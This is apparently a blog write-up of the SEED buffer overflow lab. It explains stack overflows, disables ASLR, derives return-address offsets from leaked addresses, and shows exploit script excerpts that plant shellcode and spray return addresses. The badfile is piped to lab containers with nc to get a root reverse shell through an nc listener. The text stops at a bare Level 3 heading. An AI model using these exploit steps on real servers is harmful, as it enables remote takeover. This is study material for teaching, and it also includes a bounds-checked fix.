SEED (2) - Buffer Overflow Attack

Updated: 2023-05-07 17:29:30

1. Vulnerability principle
Vulnerable code example:
#include <string.h>

/* Copies str into a fixed 12-byte stack buffer with no length check:
 * any input of 12 bytes or more overflows buffer. */
void foo(char *str)
{
    char buffer[12];
    strcpy(buffer, str);
}

int main()
{
    char *str = "This is definitely longer than 12";
    foo(str);
    return 1;
}
When the contents of str are copied into buffer, str is longer than 12 bytes, so buffer overflows: the extra bytes of str are written above the buffer, at higher addresses on the stack. The goal is to place code there and then make the function's return address point to address A, where the code is stored, so that the code is executed.
A: the start address of the code.
NOP: opcode 0x90; executing it does nothing, and execution simply continues to the next instruction. (Filling the space between foo()'s frame and the code with NOPs makes A easier to hit: as soon as the return address lands on any one of the NOPs, execution slides down to the code at A.)
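As an added example (not the lab's own code), the page's vulnerable foo() is shown beside a bounded version that rejects input that does not fit, together with a helper that reproduces the Level 1 offset arithmetic from the ebp and buffer addresses the server prints. The names foo_unsafe, foo_safe and ret_offset are my own; the sample addresses are the ones shown on this page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 12   /* same 12-byte buffer as the lab's foo() */

/* Vulnerable form from the lab: strcpy() knows nothing about the size of
 * buffer, so any input of BUF_SIZE bytes or more runs past the end of the
 * array and into the saved ebp and return address stored above it. */
void foo_unsafe(char *str)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, str);
}

/* Hardened form (hypothetical name): check the length against the
 * destination first, leaving room for the terminating NUL, and refuse
 * anything that does not fit. Returns 0 on success, -1 when rejected, so
 * the caller can log the oversized input instead of corrupting the stack. */
int foo_safe(const char *str, size_t len)
{
    char buffer[BUF_SIZE];
    if (len >= BUF_SIZE)
        return -1;                 /* would overflow: reject it */
    memcpy(buffer, str, len);
    buffer[len] = '\0';
    return 0;
}

/* Mirrors the lab's Level 1 arithmetic: the server prints the frame
 * pointer (ebp) and the buffer address inside bof(); the saved return
 * address lives 4 bytes above ebp, so its offset from the start of buffer
 * is (ebp - buffer) + 4. With the page's values this gives 116. */
size_t ret_offset(unsigned long ebp, unsigned long buffer)
{
    return (size_t)(ebp - buffer) + 4;
}

int main(void)
{
    const char *long_str = "This is definitely longer than 12";
    printf("short input accepted: %d\n", foo_safe("hello", 5));
    printf("long input rejected:  %d\n", foo_safe(long_str, strlen(long_str)));
    printf("return-address offset: %zu\n", ret_offset(0xffffd108UL, 0xffffd098UL));
    return 0;
}
```

Once the lab is finished, restore ASLR with sudo sysctl -w kernel.randomize_va_space=2 (the default setting).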
2. Lab setup
Change into the /Buffer_Overflow/Labsetup/server-code directory and run:
$ make
$ make install
$ cd ..   # back into the Labsetup directory
$ dcbuild
$ dcup
Disable the countermeasure: memory randomization (address space layout randomization)
$ sudo sysctl -w kernel.randomize_va_space=0
3. Level 1 Attack: Get the Parameters
$ echo hello | nc 10.9.0.5 9090
^C
If running this twice prints identical results and the addresses have the form 0xffffxxxx, memory randomization is off.
Container Console
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof():  0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof():    0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 6
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof():  0xffffd108
server-1-10.9.0.5 | Buffer's address inside bof():    0xffffd098
server-1-10.9.0.5 | ==== Returned Properly ====
$ cd /Buffer_Overflow/Files
$ vim exploit-L1.py
Then use ebp and the buffer address to compute the address A (ret) and the offset:
ret (A) = 0xffffd108 + 8    (min(A) = ebp + 8; max(A) = 517 - len(code))
offset = 0xffffd108 - 0xffffd098 + 4 = 116 (decimal)
Set ret and offset in exploit-L1.py to these values, save and exit; then run:
$ python3 exploit-L1.py
$ cat badfile | nc 10.9.0.5 9090
Container Console
server-1-10.9.0.5 | Got a connection from 10.9.0.1
server-1-10.9.0.5 | Starting stack
server-1-10.9.0.5 | Input size: 517
server-1-10.9.0.5 | Frame Pointer (ebp) inside bof():  0xffffd428
server-1-10.9.0.5 | Buffer's address inside bof():    0xffffd3b8
server-1-10.9.0.5 | (^_^) SUCCESS SUCCESS (^_^)
If '(^_^) SUCCESS SUCCESS (^_^)' appears as above, the attack succeeded.
Get Reverse Shell
Modify the values of ret and A in exploit-L1.py:
##################################################################
# Put the shellcode at the end
content[517-len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd428+40

# You need to calculate the offset
offset = 116

L = 4    # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
##################################################################
Open a new terminal window and run $ nc -lnv 7070 to start listening.
In another window, send the badfile file to the server:
$ python3 exploit-L1.py
$ cat badfile | nc 10.9.0.5 9090
When the listening window prints the following, the reverse shell has been obtained:
Listening on 0.0.0.0 7070
Connection received on 10.9.0.5 51582
root@ec5152748270:/bof#
4. Level 2 Attack: Buffer Size Unknown
$ echo hello | nc 10.9.0.6 9090
^C
Container Console
server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 6
server-2-10.9.0.6 | Buffer's address inside bof():    0xffffd368
server-2-10.9.0.6 | ==== Returned Properly ====
Modify the values of ret and S in exploit-L2.py:
S: the number of return-address copies = buffersize/4 (each copy is 4 bytes)
ret: BufferAddress + buffersize
##################################################################
# Put the shellcode at the end of the buffer
content[517-len(shellcode):] = shellcode

# You need to find the correct address
# This should be the first instruction you want to return to
ret = 0xffffd368+360

# Spray the buffer with S number of return address
# You need to decide the S value
S = 90
for offset in range(S):
    content[offset*4:offset*4 + 4] = (ret).to_bytes(4,byteorder='little')
##################################################################
$ python3 exploit-L2.py
$ cat badfile | nc 10.9.0.6 9090
Container Console
server-2-10.9.0.6 | Got a connection from 10.9.0.1
server-2-10.9.0.6 | Starting stack
server-2-10.9.0.6 | Input size: 517
server-2-10.9.0.6 | Buffer's address inside bof():    0xffffd368
server-2-10.9.0.6 | (^_^) SUCCESS SUCCESS (^_^)
5. Level 3 Attack: 64-bit Server
Principle:

Article link: https://www.wtabcd.cn/fanwen/fan/82/549831.html